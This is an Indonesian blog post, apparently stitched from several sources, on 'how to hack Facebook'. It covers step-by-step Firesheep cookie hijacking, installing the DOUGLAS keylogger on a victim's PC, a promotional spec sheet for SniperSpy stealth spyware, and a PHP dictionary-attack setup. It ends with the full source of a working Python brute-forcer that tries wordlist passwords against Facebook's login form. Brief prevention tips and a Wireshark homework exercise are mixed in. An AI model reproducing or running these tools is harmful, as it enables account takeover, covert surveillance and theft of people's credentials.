CARA HACK FACEBOOK DENGAN NETWORK SNIFFING
PERTAMA:Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.
KEDUA:
Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.
cara menggunakanya sebagai berikut:
1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.
nah gimana cara mencegah pencurian password dengan firesheep ini?
kamu dapat menggunakan software ForceTLS, download dihttps://addons.mozilla.org/en-US/firefox/addon/force-tls/
KETIGA:
Bismillah,
pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:
Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:
Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.
- mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
- memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.
Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?
- pertama-tama buka aplikasi wireshark
- kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
- pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
- pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
host www.facebook.com and host alamat.ip.komputer.anda - Klik start, maka proses penyadapan akan segera dimulai
- Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
- Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:
sekian postingan kali ini.
CARA HACK FACEBOOK DENGAN KEYLOGGER
PERTAMA:Kembali lagi bagi anda yang menggunakan akses internet dari warnet atau hotspot dan mungkin juga di kampus atau di kantor harap berhati-hati. cara hack facebook dengan metode ini juga cukup mudah, tinggal pasang software keylogger yang berfungsi untuk merekam aktifitas penggunaan keyboard dan kemudian menggunakan data tersebut untuk mendapatkan username dan password facebook. seseorang bisa saja memasang software keylogger ke laptop atau pc anda atau menyebar trojan kedalam komputer di dalam sebuah jaringan komputer yang tidak aman. cara mencegahnya : pastikan antivirus pada komputer anda selalu up to date.
KEDUA:
Hai facebook’er! Tutorial facebook kali ini akan menjelaskan cara hack facebook dengan keylogger. Cara’nya gimana? Keylogger itu apa? Keylogger merupakan software yang berfungsi untuk memonitoring kegiatan PC dengan me’record / merekam kegiatan keyboard. Berikut akan dijelasin cara penggunaan’nya. AMPUH! Mau ?
Bagi facebook’er yang belum mempunyai keylogger, bisa download secara gratis disini. Sebenarnya software keylogger itu macam-macam namanya. Yang krisna gunakan yaitu keylogger yang bernama DOUGLAS 1.1.
Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC warnet, PC kantor, atau mungkin PC Pacar/Istri … hahahaha
Kalau sudah pasti, sekarang krisna jelasin dah cara penggunaan’nya.
1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder DOUGLAS_ES .
2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake bahasa spanyol … hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena menggunakan bahasa Inggris. hihihi …
3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File dan 1 Folder DATA. iya to ?? hohoho
4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di ingat !!
5. Kalau proses penginstalan sudah selesai, terus ???
Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu. Untuk selanjutnya mudah kok ! hahahaha
Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja … hahaha
Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan tombol CTRL+ALT+SHIFT+F9 pada keyboard anda …
Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ INFORMATION. Terus masukkan password yang sama dengan password yang anda masukkan waktu proses penginstalan.
Nah, Selese dah !!! Mudah to ???
Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan PC tersebut.
Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda. Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali dengan memasukkan alamat email dan password facebook anda. Lalu buka keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 … Kemudian pilih READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ??? anda sendiri yang tahu..
Selamat mencoba
KETIGA:
SniperSpy adalah Password Hacking software Remote yang dikombinasikan dengan Remote Install dan Remote Viewing feature. Setelah diinstal pada PC remote, Anda hanya perlu login ke account SniperSpy. Anda secara pribadi dapat melihat aktivitas log dari PC remote! Ini berarti bahwa Anda dapat melihat log dari PC remote dari mana saja di dunia selama Anda memiliki akses internet.
Apakah Anda ingin Spy pada PC Remote? SniperSpy memungkinkan Anda untuk jarak jauh mata-mata setiap PC. Ini adalah satu-satunya perangkat lunak mata-mata remote PC dengan panel kontrol yang AMAN.
Remote PC software Spy juga menyimpan screenshot bersama dengan teks log chatting, website, penekanan tombol dalam bahasa dan banyak lagi. Remotely, melihat aktivitas anak Anda, karyawan atau siapapun menggunakan PC jauh dari Anda. Termasuk LIVE admin perintah dan kontrol.
Fitur SniperSpy :
1. Adalah perangkat lunak mata-mata SniperSpy deployable
2. Gaib Stealth Mode Option. Bekerja dalam mode siluman lengkap. Tidak terdeteksi
3. Log Semua keystrokes
4. Records setiap Password (Email, Login, Instant Messenger dll)
5. Remote Monitor Seluruh Percakapan IM sehingga Anda bisa memata-matai kegiatan IM
6. Menangkap format .jpg ukuran penuh gambar dari jendela aktif
7. Real Time Screen Viewer
8. Remote reboot atau shutdown PC atau memilih untuk logoff pengguna Windows saat ini
9. Lengkap, bypass Firewall apapun
CARA HACK FACEBOOK DENGAN METODE BRUTEFORCE
PERTAMA:Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda.
KEDUA:
Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada )
Implementasi Facebook Hacking Dengan Brute Force
Implementasi Facebook Hacking Dengan Brute Force
Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya.
ok, cukup basa basinya rel…..to the point aja deh
sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap ….
yg musti disiapin sebagai berikut
1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.
Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan
2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap.
OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita akan melakukan testing.
disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
klo ga tau cara bikin hosting silahkan tanya ke google yah )
1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
set_time_limit(0);
kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi
set_time_limit(500);
2.
$username =”brute@force.org”;
// username korban misalnya target@bego.com hingga pada code menjadi
$username =”target@bego.com”;
3.
$dictionary =”dictionary.txt”;
adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory
Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut sukses di upload dalam 1 direktory
setelah sukses, skr tinggal eksekusi tuh via eb address.
misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja dihttp://xxx.com/images/
jika di eksekusi maka script akan mencoba membruteforce account milik target lo.
Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya….
And last word, thanks for you attention if u read a simple tutorial.
KETIGA:
Silakan download FbBruteforce:
Berikut Codenya:
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help
Example : %s -u brad@hackme.com -w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if __name__ == '__main__':
main()
Tidak ada komentar:
Posting Komentar